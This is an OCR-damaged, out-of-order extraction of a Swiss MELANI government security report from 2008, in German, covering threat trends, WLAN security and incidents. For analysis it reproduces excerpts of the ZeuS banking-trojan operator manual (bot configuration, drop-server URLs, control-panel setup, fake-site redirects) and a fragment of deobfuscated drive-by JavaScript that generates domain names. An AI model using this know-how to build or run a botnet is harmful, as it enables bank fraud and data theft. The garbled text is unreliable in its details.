eingeschr nkten Windows Benutzerkonten der Einsatz unter Gast Benutzerkonten wird derzeit nicht unterst tzt 6 Unsichtbar f r die Heuristik von Antiviren Software der Rumpfteil body des Bots ist verschl sselt 7 Ruft in keinster Weise einen Verdacht auf seine Anwesenheit hervor wenn Sie dies nicht m chten G
90. r wird keine Logs und keine Statistik versenden aber die Konfigurationsdatei kontaktieren WertX Sprachcode zum Beispiel f r RU 1049 EN 1033 DynamicConfig die Werte dieses Abschnittes werden in die endg ltige Konfigurationsdatei geschrieben Je nach Ihrer Paketzusammenstellung k nnen einige der Parameter f r Sie ohne Bedeutung sein alle bedeutsamen Parameter sind in dem Beispiel das dem Softwarepaket beiliegt ausgef hrt e _url_loader url legt die URL fest unter der man ein Upgrade des Bots downloaden kann Dieser Pa rameter ist nur dann aktuell wenn Sie eine neue Bot Versions ins Botnet geschickt haben und seine Konfiguration ber dieselbe URL berschrieben haben wie die alte Konfiguration in diesem Fall begin nen die alten Bot Versionen sich ber die in diesem Eintrag angegebene Datei zu erneuern e url server url legt die URL fest ber die Statistik Dateien Logs usw von den Rechnern der Opfer versendet werden e file_webinjects legt die lokale Datei mit der Liste der Webinjects fest Eine Beschreibung des Formats dieser Datei finden Sie hier Unterabschnitt AdvancedConfigs Enth lt die Liste der URLs unter denen eine Reserve Konfigurationsdatei downgeloadet werden kann falls die Hauptdatei nicht verf gbar ist Es ist empfehlenswert in diesen Unterab schnitt 1 3 URLs einzutragen dadurch kann das Botnet vor dem Untergang bewahrt werden wenn die Hauptda tei nicht verf gbar ist und danach in a
91. ray var d9 new Date t9 y d9 getFullYear if d9 getDay gt 3 t9 d d9 getDate d9 getDay 2 else t9 d J d9 getDate d9 getDay if t9 d lt 0 t9 d 1 t9 m d9 getMonth 1 function CMN d m y var r y 3 0 m d 3 d return r var d veslox com var yCh1 yCh2 mCh dCh mNm if t9 y lt 2007 MELANI Halbjahresbericht 20091 47152 Informationssicherung Lage in der Schweiz und international t9 y 2007 mNm CMN t9 d t9 m t9 y yCh1 9 t9 y amp 0xAA mNm 63 26 yCh2 9 t9 y amp 0x331 1 gt gt 3 mNm 10 mCh 9 t9 m mNm 25 if t9 d 2 gt 0 amp amp t9 d 2 lt 9 dCh n9 t9 d 10 else dCh I9 t9 d 6 27 replace d yCh2 mCht yCh1 dCh m9 t9 m 1 com Abbildung 4 Teil des entschleierten JavaScript Codes der den Dom nennamen kreiert Entschl sseltes JavaSc ript Dies ist ein Beispiel f r eine fortgeschrittene Malware die einen grossen Aufwand zur Ver schleierung betreibt um die Analyse zu erschweren Die einfachste Methode besteht darin die Malware auf einem dedizierten System zu starten und zu beobachten Zum vertieften Verst ndnis und zur Rekonstruktion des Algorithmus ist allerdings ein Reverse Code Engi neering notwendig MELANI Halbjahresbericht 20091 48 52 Informationssicherung Lage in der Schweiz und international Beispiel Ana
92. reie Meinungsausserung Zwei Wochen spater hatte der Rich ter seine Meinung aus verfassungsrechtlichen Bedenken und anderen juristischen Erwa gungen ge ndert Die Verf gung wurde aufgehoben und die Webseite ist seit dem 29 Feb ruar 2008 unter ihrer angestammten Adresse wieder erreichbar Die Bank zog in der Folge die Klage gegen wikileaks org zur ck Wenn Firmen oder staatliche Stellen gegen die Ver ffentlichung bestimmter Dokumente im Internet vorzugehen versuchen sind Ihre Bem hungen typischerweise erfolglos In diesem Fall erschien der Schriftwechsel zwischen der Bank und ihren Anw lten wenig sp ter auf Wikileaks unter dem Hinweis dass die Zensurw nsche f r die Authenzit t des ver ffentlich ten Materials sprechen Wikileaks hat der Medienrummel um die Sperrung der Dom ne in ternational viel Publicity eingebracht Damit wurden die nachweislich falschen Dokumente noch weiter aufgewertet Wikileaks wird nach eigenen Angaben von einem weltweiten Netz von Freiwilligen betrieben Das globale Geflecht sorge dabei f r Flexibilit t im Notfall Aufgrund der vorhandenen Alter nativ Adressen wikileaks be wikileaks cx etc sind die Inhalte auch nach der Sperrung der Stamm Dom ne einfach abrufbar Selbst wenn alle bekannten alternativen Dom nen ge sperrt w rden w ren die Inhalte welche in verschiedenen L ndern auf vielen Servern ge spiegelt sind weiterhin zug nglich Selbst bei einem physischen Eingriff auf dem aktuell
93. rekt eingerichtet Machen Sie alle vom Script abgefragten Angaben 1 Root login Login und Passwort f r den erstellten Administrator des Steuerungspanels 2 MySQL server Angaben f r die MySQL Nutzung Der angegebene User muss bereits existieren die angegebene DB wird aber automatisch erstellt falls sie nicht existiert die Rechte zur Daten bank Erstellung m ssen gegeben sein 3 MySQL tables Tabellen Namen in der MySQL DB Sollten im Falle von Maskierung ge ndert wer den 4 Local paths Lokale Harddisk Pfade relativ zum Installationsverzeichnis 38 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 5 Options Zus tzliche Optionen k nnen nach der Installation im Steuerungspanel ge ndert wer den Enable log write to database Logs von infizierten Computern in die DB schreiben Diese Methode erm glicht es Suchabfragen direkt ber das Steuerungspanel durchzuf hren sie erfordert allerdings mehr Serverressourcen 1 Enable log write to local path Logs von infizierten Computern in Dateien schreiben Die Dateien werden verschl sselt und k nnen erst nach ihrer Entschl sselung durch den Builder eingesehen werden 2 Online bot timeout Timeout der online befindlichen Bots sollte je nach Server 0 5 Minuten mehr als der Wert TIMER_STATS in der Bot Konfiguration betragen Empfohlener Wert TI MER_STATS plus 5 Minuten 6 Klicken Sie auf den Button Install die
94. s gesendet werden sollen falls es bei der letzten bertragung zu Fehlern gekommen ist Empfohlener Wert timer_logs 2 2 39 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international e mer Stats Wert1 Wert2 bestimmt die Zeitspanne innerhalb deren die die Statistik an den Server gesendet werden soll hierzu zahlen die Installationen die online befindlichen Bots offene Ports der Socks Services Screenshots usw Wert1 bestimmt die Zeit in Minuten innerhalb deren die Statistik gesendet werden soll falls die letzte Ubertragung erfolgreich war Wert2 bestimmt die Zeit in Minuten innerhalb deren die Statistik gesendet werden soll falls es bei der letzten Ubertragung zu Fehlern gekommen ist Empfohlener Wert timer_logs 20 10 e url_config url URL der Haupt Konfigurationsdatei dies ist der wichtigste Parameter wenn die Kon figurationsdatei bei der Infektion des Opfer Rechners unter der angegebenen URL nicht verf gbar ist ist die Infektion sinnlos e url_compip url Wert legt die Webseite zur berpr fung der eigenen IP fest dient zur Definition der NAT url bestimmt die URL der Webseite Wert Bestimmt die Anzahl Byte die downzuloaden ausreicht um am Download seine IP zu erken nen e blacklist_languages Wert1 Wert2 WertX legt die Liste von Windows Sprachcodes fest f r die sich der Bot immer im Sleep Modus befinden soll d h e
95. sel mit von Ihnen gew hlter Schl ssell nge wenn m g lich 128 Bit muss sowohl dem Access Point wie auch dem Endger t bekannt sein Radius Server f r Firmen Die beste Absicherung des Firmennetzes bietet wahrscheinlich der Einsatz eines RADIUS Servers mit WPA2 RADIUS kontrolliert unter anderem den Zugriff auf das Funknetzwerk Die Hauptfunktionen von RADIUS sind Authentifizierung Autorisierung und Abrechnung Benutzung von Passw rtern bei mehreren Benutzern Wird das WLAN mehreren Benutzern zur Verf gung gestellt ist darauf zu achten dass der Zugang nur auf diese Benutzer beschr nkt wird Am besten geschieht dies durch ein vorher vereinbartes Passwort bei der Verschl sselung Access Point bei Nichtgebrauch abschalten Schalten Sie den Access Point ab wenn Sie ihn l ngere Zeit nicht benutzen etwa tags ber Dies gibt Hackern weniger Zeit f r einen Angriff ffentliche Funknetzwerke Auch im Bereich der ffentlichen kommerziellen und nicht kommerziellen Anbieter von Funk netzwerken stellt die R ckverfolgbarkeit der Nutzer ein aktuelles Thema dar Viele Anbieter sind nicht oder nur begrenzt in der Lage eine IP Adresse zur ckzuverfolgen und dem Be nutzer zuzuordnen In Italien hingegen ist dies seit Juli 2005 gesetzlich geregelt und samtli che Betreiber von ffentlichen Funknetzwerken m ssen ihre Benutzer registrieren Diese Regelung betrifft beispielsweise Internetcafebetreiber oder Hotels In der Schweiz ist die La
96. sichtigt case sensitive Derzeit sind folgende Schalter verf gbar o P neue URL laden bei POST Anfrage der urspr nglichen URL o G neue URL laden bei GET Anfrage der urspr nglichen URL o S neue URL laden unter Beibehaltung des Pfades Dieser Schalter erlaubt die freie Verwendung von Scamsites als gew hnliche Fake Sites ausf hrlicher siehe weiter unten Blackmask POST Mask derjenigen an die neue URL bergebenen POST Daten bei deren Vorliegen nicht die Fakesite geladen wird Gew hnlich werden hier Felder angegeben die sich in der Fakesite be finden dadurch kann verhindert werden dass die Fakesite in einer Endlosschleife auf sich selbst ver weist Wenn keine Notwendigkeit vorliegt dieses Feld auszuf llen kann es leer gelassen werden oder mit dem Zeichen ausgef llt werden Whitemask POST Mask derjenigen an die neue URL bergeben POST Daten bei deren Vorliegen die Fakesite geladen wird D h wenn die POST Daten nicht mit dieser Maske bereinstimmen so wird die Fakesite nicht geladen Dieses Feld wird in der Praxis ziemlich selten verwendet lassen Sie es leer oder f llen Sie es mit dem Zeichen aus damit es ignoriert wird Blockierungs URL falls Ihr URL Redirect nur ein Mal auf dem Rechner des Opfers geladen werden soll muss hier eine URL Mask angegeben werden bei deren Aufruf das betreffende URL Redirect auf dem Rechner nicht mehr verwendet wird Falls Sie es nicht ben tigen lasen Sie dieses Feld le
97. sierung der Konfigurationsdatei Zerst rung des Betriebssystems 21 Socks4 Server 22 HTTP S PROXY Server 23 Upgrade des Bots auf die neueste Version die URL der neuen Version schreibt sich in die Konfigu rationsdatei ein 2 Das Steuerungspanel In diesem Kapitel wird die Benutzer Schnittstelle des Steuerungspanels vorgestellt Sie gleicht der Schnittstelle jeder anderen im legalen Handel verkauften Software und nutzt da bei PHP und als Datenbank MySQL Dies erm glicht die Nutzung durch verschiedene Per sonen mit unterschiedlichen Berechtigungen und Bed rfnissen 1 Setzt PHP MySQL voraus 2 Einfache Installation gew hnlich gen gt die Eingabe der MySQL Userdaten und das Anklicken des Buttons Install 3 Mehrbenutzerverwaltung jedem Benutzer k nnen bestimmte Zugangsrechte erteilt werden 37152 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Statistik der Installationen Infizierungen Statistik der online befindlichen Bots Aufteilung des Botnets in Subbotnets bersicht ber die online befindlichen Bots auch Filter m glich 1 Screenshot Sichtung in Echtzeit 2 Sichtung und berpr fung von Sock4 3 Online Dauer des Bots 4 Verbindungsgeschwindigkeit nur f r Bots ausserhalb der NAT 8 Datenbank Speicherung von Logs Dies hat folgende Vorteile 1 Suche nach Logs per Inhalts Filter 2 Suche nach Logs per Vorgaben in denen die ge
98. snahmen f r Computer sei es in ei nem privaten Haushalt oder in einem gesch ftlichen Umfeld sind noch immer g ltig und un ter allen Umst nden weiterhin einzuhalten Allerdings gen gen sie heutzutage nicht mehr Beim Auto gelten Sitzgurte eine angepasste Geschwindigkeit und das Befolgen von Ver kehrsregeln als Voraussetzungen f r ein sicheres Fahren und dennoch k nnen diese Si cherheitsvorkehrungen einen Unfall nicht immer verhindern Genauso verh lt es sich in der heutigen Welt der Bits und Bytes Zwar liessen sich noch immer die berwiegende Mehrheit der Angriffe auf Computer und Netzwerke mit technischen Sicherheitsvorkehrungen und et was gesundem Menschenverstand verhindern doch wie im Verkehr muss auch in der Welt der Informations und Kommunikationstechnologien endg ltig vom absoluten Sicherheits gedanken Abschied genommen werden Bei den letzten usserst breit gestreuten E Mail Wellen siehe Kapitel 4 2 sind zwischen Versand und dem Zeitpunkt als die ersten Viren scanner die Malware erkannt haben zwischen sechs und zw lf Stunden vergangen Gen gend Zeit also um praktisch alle m glichen Opfer zu infizieren Bei gezielten Angriffen ber E Mail bei denen mehrere Hundert Empf nger angeschrieben werden ist ohne Emergency Patch seitens des Antivirenherstellers nicht mit einer Erkennung innerhalb von Stunden zu rechnen sofern der Angriff berhaupt erkannt wird Moderne Malware ist so konzipiert dass sie m glich
99. solches Vor gehen wird gemeinhin als Commodity Hacking bezeichnet Unterschieden wird zwischen folgenden Kategorien Speicherger te und Netzwerkger te Was diese beiden Kategorien verbindet ist das implizite Vertrauen der Konsumenten dass diese Ger te sofort mittels Plug amp Play verwendet werden k nnen ohne Sicherheitskon trollen ihrerseits durchf hren zu m ssen Dieses Vertrauen macht solche Ger te jedoch zu einem idealen Mittel zur Verbreitung von Malware Speicherger te Handels bliche Speicherger te sind sehr breit definiert Einerseits umfassen sie Ger te wie USB Sticks und externe Festplatten die spezifisch f r die Speicherung zu s tzlicher Daten gekauft werden Aber auch digitale Fotorahmen Telefone Medienplayer und viele andere Ger te mit Flash Speicherchips fallen in diese Kategorie Viele Computer sind so eingestellt dass beim Anschliessen von solchen USB Speicherger ten automatisch Ordner respektive Dateien ge ffnet werden Diese im autorun inf festgelegten Aktionen k n nen auch dazu benutzt werden Schadsoftware zu installieren 7 Siehe http www securityfocus com news 11499 Stand 08 07 2008 11 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Neizwerkger te Die zweite Kategorie stellen vernetzte Ger te dar Diese reichen von inter nen Netzwerkger ten wie Scanner und Drucker bis hin zu Gateway Ger ten Routern und kabellosen
100. sse Koalition verteidigt geplante Novelle des BKA Gesetzes meldung 109743 Stand 29 07 2008 27 Livre blanc sur la d fense et la s curit nationale tome 1 partie 1 http www premier ministre gouv fr IMG pdf livre_blanc_tome1 partie1 pdf Stand 21 07 2008 25 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Idas eigene Land n tig mache Tats chlich sehen immer mehr Staaten milit rischen Hand lungsbedarf im Cyberbereich und bauen Kapazit ten auf Darunter fallen insbesondere die USA sowie China Dies deutet darauf hin dass immer mehr Staaten das milit rische Po tential von Informationssystemen neu beurteilen und dass somit das klassische R stungs verhalten souver ner Staaten auch den Cyberraum nicht verschont bzw verschonen wird Schweden Umstrittenes berwachungsgesetz von Parlament verabschiedet Im Juni 2008 hat das schwedische Parlament ein umstrittenes Sicherheitsgesetz verab schiedet welches die berwachungsbefugnisse des milit rischen Geheimdienstes auswei tet Das Gesetz erlaubt dem milit rischen Geheimdienst die berwachung des gesamten schwedischen E Mail Telefon und SMS Verkehrs mit dem Ausland Eine richterliche An ordnung ist nicht notwendig Technisch sollen die Hauptdatenleitungen welche Schweden mit dem Ausland verbinden mit Filtern ausger stet werden und auf bestimmte Suchw rter reagieren Das Gesetz soll im Januar 2
101. st lange nicht von Antivirensoftware erkannt wird Zus tzlich zu den Limiten technischer Sicherheitsmassnahmen gesellen sich der teilweise unsorgsame und schon fast naive Umgang mit Informationen und Daten innerhalb des IT Sicherheitsperimeters Jede Firewall ist nutzlos wenn Daten innerhalb eines Unternehmens offen herumliegen oder einfach aufgefunden werden k nnen Noch viel weniger k nnen technische Schutzmassnahmen etwas dagegen ausrichten wenn in der internen Post CD ROMs mit ein paar Millionen Bankkontendaten Steuerrechnungen und dergleichen einfach verloren gehen Auch gegen eine unbedachte Platzierung pers nlicher Informationen auf dem Internet unter anderem auf sozialen Netzwerken siehe Kapitel 3 2 sind technische Schutzmassnahmen machtlos In diesem Sinne ist in naher Zukunft ein weiteres Zusammenspiel verschiedener Faktoren zu beobachten Zum Einen wird die Tatsache dass die klassischen IT Sicherheitsmassnahmen nur noch bedingten Schutz erm glichen ein Umdenken im bergeordneten Bereich der In formationssicherung ausl sen m ssen Zum Anderen wird der teils sorglose Umgang mit pers nlichen vertraulichen oder betrieblichen Informationen weiterhin ein Risiko bei Angrif fen darstellen Sei es zur Vorbereitung von Angriffen oder aber weil nach einem erfolgrei chen Durchdringen der technischen Schutzw lle die Suche und der Zugriff nach Daten dem Angreifer leicht gemacht werden Diese Entwicklung erfordert ein Umdenken
102. t bestem Ruf und hohen Besucherzahlen Betroffen sind sogar Seiten von Regierungseinrich tungen wie beispielsweise jene der vereinten Nationen un org Auch MELANI wurden im ersten Halbjahr 2008 vermehrt Webseiten gemeldet welche ge hackt worden sind um anschliessend eine Drive By Infektion zu platzieren siehe Kapitel 4 3 Die Skripte ffnen versteckte Frames mit Exploits um die Computer der Besucher mit Sch dlingen zu infizieren und zwar ohne Benutzerinteraktion jedoch indem Sicherheitsl cken im Webbrowser ausgenutzt werden Sollte dies nicht funktionieren wird anschliessend versucht den Besucher zu verleiten ein Programm oder Plugin zu installieren Auch dadurch wird der Computer mit einer Schadsoftware meist einem Trojaner Downloader infiziert wel che weiteren Schadcode nachladen kann Im Juni 2008 wurde eine Vielzahl Schweizer Webseiten gehackt und darauf ein b sartiges JavaScript platziert Das perfide bei diesem Angriff war dass bei einem normalen Aufruf der Seite der Schadcode nicht ausgef hrt wurde Wurde die Seite jedoch via Suchmaschine beispielsweise Google oder Yahoo aufgerufen dann wurde der Schadcode aktiviert Der Grund dieser Verschleierungstaktik liegt darin dass der Webseitenbesitzer seine Seite h u fig aufruft dies aber in der Regel direkt oder via Favoritenliste macht Somit wird dazu beige tragen die Infektion so lange als m glich unerkannt zu halten Die Methoden um Schadcode auf eine Webseite e
103. t sich die Gefahr von Drive by Infektionen weiter erhoht Dieser Anhang erklart anhand eines anonymisierten Schweizer Beispiels wie eine solche Infektion ablauft Definition Drive by Infektionen sind ein Mittel zur Verbreitung von Malware Durch sie kann ein Compu ter beim blossen Ansurfen einer Webseite infiziert werden Der Benutzer bemerkt dies unter Umstanden nicht Das Ziel der Malware Autoren besteht in der Regel darin sich Zugang zu den Rechnern von Endbenutzern zu beschaffen Der Begriff Drive by Infektion ist ein Amerikanismus der sich auf den Komfort des Konsums mit dem Auto bezieht etwa Drive by Shopping Drive by Restaurants oder Drive by Kinos und metaphorisch furs Sur fen im Internet verwendet wird Bei Drive by Attacken missbrauchen die Malware Autoren meistens Webseiten von Dritten in deren Code sie zus tzliche b sartige Elemente einbau en Die Infektion Es gibt mehrere M glichkeiten zur Infizierung von Webseiten mit sch dlichem Code Auf PHP basierende Anwendungen beinhalten oft verwundbare Teile welche dem Angreifer den Zugang zum Betriebssystem oder zum Dateisystem erm glichen Auch der Webserver selbst kann solche Sicherheitsl cken beinhalten Das Ausnutzen dieser Sicherheitsl cken erlaubt es den Angreifern Webinhalte zu manipulieren und zus tzlichen Code einzuschleusen Eine weitere M glichkeit Webinhalte ver ndern zu k nnen ist der Missbrauch von FTP Login Daten welche zur Verwaltun
104. t und Terro rismus die im Zusammenhang mit IKT Infrastrukturen stehen Anhand ausgew hlter Bei spiele werden wichtige Ereignisse der ersten sechs Monate des Jahres 2008 aufgezeigt Der Leser findet hier konkrete Beispiele und erg nzende Informationen zu den allgemeinen Kapi teln 2und 3 Kapitel 6 befasst sich mit einem Thema aus dem Bereich der Pravention das in engem Zu sammenhang mit den in Kapitel 3 erwahnten Gefahren steht Kapitel 7 legt den Fokus auf staatliche und privatwirtschaftliche Aktivitaten zum Thema In formationssicherung im In und Ausland Kapitel 8 fasst Anderungen in den gesetzlichen Grundlagen zusammen Kapitel 9 enthalt ein Glossar mit den wichtigsten Begriffen die im Bericht verwendet werden Kapitel 10 ist ein Anhang mit erweiterten technischen Erlauterungen und Anleitungen zu ausgewahlten Themen des Halbjahresberichtes MELANI Halbjahresbericht 20091 5 52 Informationssicherung Lage in der Schweiz und international 2 Aktuelle Lage Gefahren und Risiken 2 1 Von der IT Sicherheit zur Informationssicherung Vor rund 4 Jahren hat die Melde und Analysestelle zur Informationssicherung Schweiz ME LANI ihre Arbeit aufgenommen Wie die meisten propagierte MELANI von Beginn weg die klassischen technischen Schutzmassnahmen wie Antivirensoftware regelm ssige Updates von Programmen und Betriebssystemen den Einsatz von Firewalls und die Notwendigkeit von Backups Dieses ABC der wichtigsten Schutzmas
105. t wird der Anpas sungsbedarf im Straf und Strafprozessrecht vertieft gepr ft F r weitere Informationen siehe http www ejpd admin ch ejpd de home themen kriminalitaet ref_ gesetzgebung ref_netzwerkkriminalitaet html Stand 28 07 2008 MELANI Halbjahresbericht 20091 29 52 Informationssicherung Lage in der Schweiz und international 9 Glossar Dieses Glossar enth lt s mtliche kursivhervorgehobenen Begriffe des vorliegenden Be richts Ein ausf hrlicheres Glossar mit mehr Begriffen ist zu finden unter http www melani admin ch glossar index html lang de Access Point Ein Wireless Access Point ist ein elektronisches Gerat das als Schnittstelle zwischen einem Funknetz und einem kabelgebunde nen Rechnernetz fungiert Activex Eine von Microsoft entwickelte Technologie mit welcher es m g lich ist kleine Programme so genannte ActiveX Controls beim Anzeigen von Webseiten auf den Rechner des Besuchers zu la den von wo sie ausgef hrt werden Sie erm glichen es unter schiedliche Effekte oder Funktionen umzusetzen Leider wird diese Technologie h ufig missbraucht und stellt ein Sicherheitsrisiko dar Beispielsweise werden viele Dialer ber ActiveX auf den Rechner geladen und ausgef hrt Die ActiveX Problematik betrifft nur den Internet Explorer da die anderen Browser diese Technologie nicht unterst tzen Bot Malicious Bot Ursprung im slawischen Wort f r Arbeit Robota
106. tanl sse wie die EURO 2008 werden immer wieder von politisch motivierten Ha ckern als Anlass f r ihre Taten genutzt So haben vermutlich t rkische Nationalisten die Webseite des kroatischen Aussenministeriums w hrend des Spiels der beiden L nder ver unstaltet siehe Kapitel 4 4 Cyber Attacken sind ein begehrtes Mittel um Aufmerksamkeit f r ein politisches Anliegen zu erlangen Erstens sind diese Mittel relativ kosteng nstig Zweitens ist es im Internet m glich Spuren gut zu verwischen und somit eine R ckverfolgung auf den T ter zu erschweren Und drittens f hrt die zunehmende Abh ngigkeit unserer modernen Gesellschaft von informati onstechnischen Mitteln dazu dass zahlreiche Angriffsfl chen zur Verf gung stehen und vor allem dass solche Attacken weltweit wahrgenommen werden Es kann damit gerechnet werden dass politische Konflikte und Auseinandersetzungen in Zukunft vermehrt von Ha cking Attacken begleitet werden Dabei ist aber zu bedenken dass solche Aktionen konflikt und kriegsbegleitend sein k nnen selber aber nicht zur direkten Unterst tzung von Kriegs handlungen taugen Demzufolge entspricht die gerne vorgenommene Vermischung von Hacktivismus und Cyberwar nicht der Realit t 3 Tendenzen Allgemeine Entwicklungen 3 1 Offene Funknetzwerke als Sicherheitsrisiko Funknetzwerke so genannte WLANs sind heute auch privat weit verbreitet Zudem ver schiebt sich der Trend immer deutlicher weg vom Desk
107. ternational Kapitel 5 1 e Massenhacks legitimer Webseiten Die Gefahr einer Infektion ber Webseiten mittels Drive By Infektion w chst rasant Seit Januar 2008 sind verschiedene Massenhacks von Webseiten beobachtet worden welche beabsichtigt haben deren Besucher zu infizieren Darunter befinden sich auch Webseiten mit bestem Ruf und hohen Besucherzahlen Aktuelle Lage Kapitel 2 2 Vorf lle Schweiz Kapitel 4 Anhang Kapitel 10 2 e Politisch motiviertes Hacking Cyber Attacken k nnen ein attraktives Mittel darstellen um f r ein politisches Anliegen Aufmerksamkeit zu erlangen Im Bereich der Internet Kriminalit t r cken somit nebst finanziellen Motiven vermehrt politische Beweggr nde in den Vordergrund J ngste Entwicklungen haben dazu beigetragen dass politisch motiviertes Hacking der so ge nannte Hacktivismus ffentlich diskutiert wird Aktuelle Lage Kapitel 2 3 gt Vorf lle international Kapitel 5 2 Aktivit ten staatlich Kapitel 7 1 e Offene Funknetzwerke als Sicherheitsrisiko Funknetzwerke WLANs sind heute auch privat weit verbreitet Sind diese Netzwerke ungen gend gesch tzt k nnen Kriminelle einerseits auf interne Daten zugreifen und anderseits erm glicht dies ihnen bei einer IT Straftat die wahre Urheberschaft zu ver schleiern Solche Missbr uche treten leider immer h ufiger auf Das Befolgen gewis ser Grundregeln hilft das eigene Netzwerk sauber zu halten Tendenzen f r das
108. ternet kriminalit t beobachte P Verschiedene Gruppen von Kriminellen konzentrieren sich auf ein zelne Gebiete und werben Personen mit grossem Fachwissen an Dieses Know how wird anschliessend Dritten zur Verf gung gestellt vermietet oder verkauft Dabei geht es nat rlich immer ums Geld Ein Beispiel f r diese Arbeitsteilung liefert der Vertrieb einer Software genauer gesagt eines Bots Spionagesoftware mit der Bezeichnung ZeuS welcher in verschiedenen Varianten und mit unterschiedlichen Bezeichnungen zu finden ist Eine Variante ist beispielsweise Wsnpoem ein Trojanisches Pferd welches E Banking Systeme angreift Die Software ist momentan in einer lteren Version frei auf dem Internet verf gbar was von den Autoren sicherlich so nicht vorgesehen war Mit einem End User Licence Agreement wird versucht den kostenlosen Vertrieb zu begrenzen Angesichts der Kundschaft an die er sich wendet d rfte sich dies allerdings als ziemlich schwierig erweisen Im Installationspaket ist ebenfalls ein ausf hrliches Benutzerhandbuch in Russisch enthalten Wir analysieren im Folgenden Ausz ge daraus und zeigen auf wie einfach die Benutzung dieser Software ist Auch wird auf die Qualit t des Supports verwiesen welcher von den Entwicklern von ZeuS angeboten wird Benutzerlizenz 1 Der Verkaufer 1 Leistet qualifizierten technischen Support via Internet 2 Tragt keine Verantwortung f r Datenverlust Schliessung Abschaltung von Server
109. tisierung dieses Falles hat auch dazu beigetragen 3 Siehe den MELANI Halbjahresberichte 2007 2 Kapitel 6 http www melani admin ch dokumentation 00123 00124 01048 index html lang de Stand 15 08 08 Siehe f r weiterf hrende Informationen http www alexandrasamuel com dissertation index html Stand 15 08 08 5 Siehe zur Attacke gegen Estland den MELANI Halbjahresberichtes 2007 1 Kapitel 5 1 http www melani admin ch dokumentation 00123 00124 01029 index html lang de Stand 15 08 08 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international dass die NATO im Mai dieses Jahres die Errichtung eines Zentrums fur Computerverteidi gung beschlossen hat siehe Kapitel 7 1 2008 haben unter anderem schwelende Konflikte zwischen Russland und Teilstaaten der ehemaligen Sowjetunion zu politisch motivierten Hacking Attacken gefuhrt So sind Litauen und Georgien Opfer von Cyber Attacken geworden welche ihren Ursprung in Konflikten mit Russland haben d rften Eine weitere wohl politisch motivierte DDoS Attacke hat sich gegen das durch die USA unterst tze Radio Free Europe gerichtet Siehe Kapitel 5 2 f r die Atta cken gegen Litauen und Radio Free Europe Ein etwas anderes Beispiel von politisch moti viertem Hacking bieten die Vorwahlen in den USA Der Webauftritt von Obama ist so mani puliert worden dass dessen Besucher auf die Webseite von Clinton umgeleitet worden sind Auch Spor
110. top Computer und hin zu tragbaren Ger ten welche standardm ssig mit einer Funknetzkarte ausgestattet sind Auch das iPho ne wird der Funknetztechnik weiteren Schwung verleihen Leider nimmt andrerseits auch der Missbrauch von Funknetzwerken stetig zu Ist eine Funkverbindung nicht ausreichend gesch tzt ist es m glich dadurch sowohl auf ein vorhandenes internes Netzwerk als auch auf das Internet zuzugreifen Der gesamte Netz Der Konflikt zwischen Russland und Georgien wurde seit Ende Juli 2008 von heftigen Cyber Attacken insbe sondere gegen georgische Regierungsseiten begleitet Da sich diese Attacken im zweiten Halbjahr 2008 abspie len wird in diesem Bericht nicht n her dar ber berichtet 9 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international werkverkehr der Uber dieses Funknetzwerk l uft kann mitgeschnitten werden Fehlen im internen Netzwerk Zugangsrestriktionen auf freigegebene Ordner kann zudem auch darauf problemlos zugegriffen werden Dies ist besonders in Firmennetzwerken problematisch Ein virtueller Einbruch bei einem Unternehmen kann fur Angreifer durchaus lukrativ sein Be kanntestes Beispiel ist der Einbruch in das Netzwerk von TJX im Jahr 2006 Eine unzurei chende WLAN Verschl sselung in einem Gesch ft in Minnesota USA erm glichte die Kompromittierung von 45 7 Millionen Kundenkonten Die Hacker konnten das mit WEP ver schl sselte Netzwerk knacken und
111. usannnnnnnnnnnnnnnnnn nenn nenn nun nenn nennen nn nn 13 4 1 Pannen E E E Deeg one E AE 13 Vertrauliche Daten zu Schengen auf EJPD Webseite ver ffentlicht 13 4 2 Attacken irsini a wil eaten ate lees 13 Regelm ssige Spam E Mails zielen auf E Banking Applikationen 001501111ens 13 M glicher Angriff auf Torza evelme ch 15 4 3 Kriminallt tsn an ii Hrn ee ee 15 Verschiedene Webseiten f r Drive By Infektionen missbraucht 15 e E Se 16 EURO 2008 nur begrenzt durch Cyberkrminelle ausgenutzt cece 16 Zeitweilige Sperrung von wikileake om 17 5 Aktuelle Lage IKT Infrastruktur international unnssssnnnnnnnennnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn 18 Sch A ATAL a EE EE et ee 18 Beschadigte Internet Seekabel f hren zu Beeintr chtigung des Internets 18 Nachsichtiger Umgang mit sensiblen Daten uusssssersnnnnnnnnnnnnnnnnnnnnn nenn 19 5 2 le E WEE 20 Politisch motiviertes Hacking Litauen und Radio Free Europe im Visier 20 Dom nen von ICANN und IANA gehackt 20 GD E EE EA 6 1 Schwerpunkt Funknetzwerke nn 21 7 Aktivit ten Informatlonen 2 ea 24 ee VB lte EE EE 24 Deutschland Debatte betreffend Online Durchsuchungen geht weiter 24 Frankreich Aufr stung im Bereich der Bek mpfung von Cyber Attacken 25 Schweden Umstrittenes Uberwachungsgesetz von Parlament verabschiedet 26 NATO Err
112. vermarktung analysiert zu werden Im Umgang mit Social Networking Seiten gilt prinzipiell dasselbe wie im allgemeinen Um gang mit dem Internet Es sollten nur m glichst wenig pers nliche Informationen preisgege ben werden Diese sollten gut gesch tzt und nur definierten Personen zug nglich gemacht werden Schlussendlich liegt die Verantwortung bei jedem einzelnen Internet Nutzer Im Vor feld einer Publikation muss jede Person f r sich selbst abw gen und entscheiden welche pers nlichen Daten sie auf dem Internet ver ffentlicht und somit f r unbestimmte Zeit der ffentlichkeit zug nglich machen will 3 3 Commodity Malware und Commodity Hacking Seit Ende 2007 treten immer wieder F lle auf bei denen handels bliche Ger te so genann te Commodities mit einfachen Betriebssystemen oder Speicherplatz in einem verwundbaren oder infizierten Zustand verkauft werden Diese Ger te reichen von USB Sticks und Laufwerken ber USB verkn pfte digitale Fotorahmen bis hin zu vernetzten Ger ten wie Routern und kabellosen Routern Sie werden als gew hnliche serienm ssige common off the shelf COTS Konsumartikel verkauft und sind meist so ausgestattet dass sie ohne wei tere Software oder Hardwareinstallationen sofort verwendet werden k nnen Einige werden unabsichtlich mit 